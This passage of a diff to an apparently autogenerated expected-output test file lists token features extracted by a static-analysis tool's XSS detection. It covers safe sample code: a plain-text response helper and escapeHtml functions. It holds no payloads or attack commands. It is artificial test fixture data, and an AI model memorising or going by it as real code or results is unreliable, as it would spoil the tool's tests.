autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:9:24:9:37 | "content-type" | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:9:24:9:66 | "conten ... =utf-8" | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:9:24:9:66 | "conten ... =utf-8" | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:9:24:9:66 | "conten ... =utf-8" | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:9:24:9:66 | "conten ... =utf-8" | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:9:24:9:66 | "conten ... =utf-8" | enclosingFunctionBody | resp text resp writeHead 200 content-type text/plain; charset=utf-8 resp end text | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:9:24:9:66 | "conten ... =utf-8" | enclosingFunctionBody | resp text resp writeHead 200 content-type text/plain; charset=utf-8 resp end text | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:9:24:9:66 | "conten ... =utf-8" | enclosingFunctionName | sendTextResponse | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:9:24:9:66 | "conten ... =utf-8" | enclosingFunctionName | sendTextResponse | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:9:24:9:66 | "conten ... =utf-8" | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:9:24:9:66 | "conten ... =utf-8" | fileImports | http url | | autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:9:40:9:66 | "text/p ... =utf-8" | CalleeFlexibleAccessPath | resp.writeHead | | autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:9:40:9:66 | "text/p ... =utf-8" | InputAccessPathFromCallee | 1.content-type | | autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:9:40:9:66 | "text/p ... =utf-8" | InputArgumentIndex | 1 | @@ -20765,6 +137909,31 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:9:40:9:66 | "text/p ... =utf-8" | enclosingFunctionBody | resp text resp writeHead 200 content-type text/plain; charset=utf-8 resp end text | | autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:9:40:9:66 | "text/p ... =utf-8" | enclosingFunctionName | sendTextResponse | | autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:9:40:9:66 | "text/p ... =utf-8" | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:10:3:10:6 | resp | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:10:3:10:6 | resp | contextSurroundingFunctionParameters | (resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:10:3:10:6 | resp | enclosingFunctionBody | resp text resp writeHead 200 content-type text/plain; charset=utf-8 resp end text | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:10:3:10:6 | resp | enclosingFunctionName | sendTextResponse | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:10:3:10:6 | resp | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:10:3:10:10 | resp.end | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:10:3:10:10 | resp.end | contextSurroundingFunctionParameters | (resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:10:3:10:10 | resp.end | enclosingFunctionBody | resp text resp writeHead 200 content-type text/plain; charset=utf-8 resp end text | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:10:3:10:10 | resp.end | enclosingFunctionName | sendTextResponse | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:10:3:10:10 | resp.end | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:10:3:10:16 | exceptional return of resp.end(text) | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:10:3:10:16 | exceptional return of resp.end(text) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:10:3:10:16 | exceptional return of resp.end(text) | enclosingFunctionBody | resp text resp writeHead 200 content-type text/plain; charset=utf-8 resp end text | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:10:3:10:16 | exceptional return of resp.end(text) | enclosingFunctionName | sendTextResponse | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:10:3:10:16 | exceptional return of resp.end(text) | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:10:3:10:16 | resp.end(text) | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:10:3:10:16 | resp.end(text) | contextSurroundingFunctionParameters | (resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:10:3:10:16 | resp.end(text) | enclosingFunctionBody | resp text resp writeHead 200 content-type text/plain; charset=utf-8 resp end text | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:10:3:10:16 | resp.end(text) | enclosingFunctionName | sendTextResponse | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:10:3:10:16 | resp.end(text) | fileImports | http url | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:10:8:10:10 | end | contextFunctionInterfaces | sendTextResponse(resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:10:8:10:10 | end | contextSurroundingFunctionParameters | (resp, text) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:10:8:10:10 | end | enclosingFunctionBody | resp text resp writeHead 200 content-type text/plain; charset=utf-8 resp end text | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:10:8:10:10 | end | enclosingFunctionName | sendTextResponse | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:10:8:10:10 | end | fileImports | http url | | autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:10:12:10:15 | text | CalleeFlexibleAccessPath | resp.end | | autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:10:12:10:15 | text | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:10:12:10:15 | text | contextFunctionInterfaces | sendTextResponse(resp, text) | @@ -20773,17 +137942,434 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:10:12:10:15 | text | enclosingFunctionName | sendTextResponse | | autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:10:12:10:15 | text | fileImports | http url | | autogenerated/Xss/ReflectedXss/ReflectedXssGood2.js:10:12:10:15 | text | receiverName | resp | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:1:1:1:0 | this | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:1:1:1:0 | this | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:1:1:1:1 | escapeHtml1 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:1:1:1:1 | escapeHtml1 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:1:1:1:1 | escapeHtml1 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:1:1:1:1 | escapeHtml2 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:1:1:1:1 | escapeHtml2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:1:1:1:1 | escapeHtml2 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:1:1:1:1 | escapeHtml3 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:1:1:1:1 | escapeHtml3 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:1:1:1:1 | escapeHtml3 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:1:1:1:1 | escapeHtml4 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:1:1:1:1 | escapeHtml4 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:1:1:1:1 | escapeHtml4 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:1:1:1:1 | require | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:1:1:1:1 | require | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:1:5:1:11 | express | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:1:5:1:11 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:1:5:1:11 | express | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:1:5:1:32 | express | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:1:5:1:32 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:1:5:1:32 | express | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:1:5:1:32 | express ... press') | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:1:5:1:32 | express ... press') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:1:5:1:32 | express ... press') | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:1:15:1:21 | require | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:1:15:1:21 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:1:15:1:21 | require | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:1:15:1:32 | exceptional return of require('express') | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:1:15:1:32 | exceptional return of require('express') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:1:15:1:32 | exceptional return of require('express') | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:1:15:1:32 | require('express') | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:1:15:1:32 | require('express') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:1:15:1:32 | require('express') | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:1:23:1:31 | 'express' | CalleeFlexibleAccessPath | require | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:1:23:1:31 | 'express' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:1:23:1:31 | 'express' | calleeImports | | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:1:23:1:31 | 'express' | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:1:23:1:31 | 'express' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:1:23:1:31 | 'express' | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:3:5:3:7 | app | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:3:5:3:7 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:3:5:3:7 | app | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:3:5:3:19 | app | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:3:5:3:19 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:3:5:3:19 | app | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:3:5:3:19 | app = express() | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:3:5:3:19 | app = express() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:3:5:3:19 | app = express() | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:3:11:3:17 | express | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:3:11:3:17 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:3:11:3:17 | express | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:3:11:3:19 | exceptional return of express() | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:3:11:3:19 | exceptional return of express() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:3:11:3:19 | exceptional return of express() | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:3:11:3:19 | express() | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:3:11:3:19 | express() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:3:11:3:19 | express() | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:5:1:5:0 | this | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:5:1:5:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:5:1:5:0 | this | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:5:1:5:0 | this | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:5:1:5:0 | this | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:5:1:43:1 | 'arguments' object of function escapeHtml1 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:5:1:43:1 | 'arguments' object of function escapeHtml1 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:5:1:43:1 | 'arguments' object of function escapeHtml1 | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:5:1:43:1 | 'arguments' object of function escapeHtml1 | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:5:1:43:1 | 'arguments' object of function escapeHtml1 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:5:1:43:1 | exceptional return of function escapeHtml1 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:5:1:43:1 | exceptional return of function escapeHtml1 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:5:1:43:1 | exceptional return of function escapeHtml1 | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:5:1:43:1 | exceptional return of function escapeHtml1 | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:5:1:43:1 | exceptional return of function escapeHtml1 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:5:1:43:1 | functio ... html;\\n} | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:5:1:43:1 | functio ... html;\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:5:1:43:1 | functio ... html;\\n} | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:5:1:43:1 | return of function escapeHtml1 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:5:1:43:1 | return of function escapeHtml1 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:5:1:43:1 | return of function escapeHtml1 | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:5:1:43:1 | return of function escapeHtml1 | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:5:1:43:1 | return of function escapeHtml1 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:5:10:5:20 | escapeHtml1 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:5:10:5:20 | escapeHtml1 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:5:10:5:20 | escapeHtml1 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:5:10:5:20 | escapeHtml1 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:5:10:5:20 | escapeHtml1 | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:5:10:5:20 | escapeHtml1 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:5:10:5:20 | escapeHtml1 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:5:22:5:27 | string | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:5:22:5:27 | string | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:5:22:5:27 | string | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:5:22:5:27 | string | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:5:22:5:27 | string | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:5:22:5:27 | string | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:5:22:5:27 | string | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:5:22:5:27 | string | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:5:22:5:27 | string | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:5:22:5:27 | string | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:6:7:6:9 | str | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:6:7:6:9 | str | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:6:7:6:9 | str | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:6:7:6:9 | str | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:6:7:6:9 | str | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:6:7:6:23 | str | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:6:7:6:23 | str | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:6:7:6:23 | str | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:6:7:6:23 | str | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:6:7:6:23 | str | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:6:7:6:23 | str = "" + string | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:6:7:6:23 | str = "" + string | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:6:7:6:23 | str = "" + string | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:6:7:6:23 | str = "" + string | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:6:7:6:23 | str = "" + string | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:6:13:6:14 | "" | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:6:13:6:14 | "" | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:6:13:6:14 | "" | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:6:13:6:14 | "" | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:6:13:6:14 | "" | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:6:13:6:14 | "" | stringConcatenatedWith | -endpoint- string | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:6:13:6:23 | "" + string | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:6:13:6:23 | "" + string | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:6:13:6:23 | "" + string | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:6:13:6:23 | "" + string | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:6:13:6:23 | "" + string | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:6:18:6:23 | string | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:6:18:6:23 | string | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:6:18:6:23 | string | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:6:18:6:23 | string | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:6:18:6:23 | string | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:6:18:6:23 | string | stringConcatenatedWith | '' -endpoint- | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:7:7:7:12 | escape | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:7:7:7:12 | escape | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:7:7:7:12 | escape | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:7:7:7:12 | escape | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:7:7:7:12 | escape | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:7:7:7:12 | escape | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| 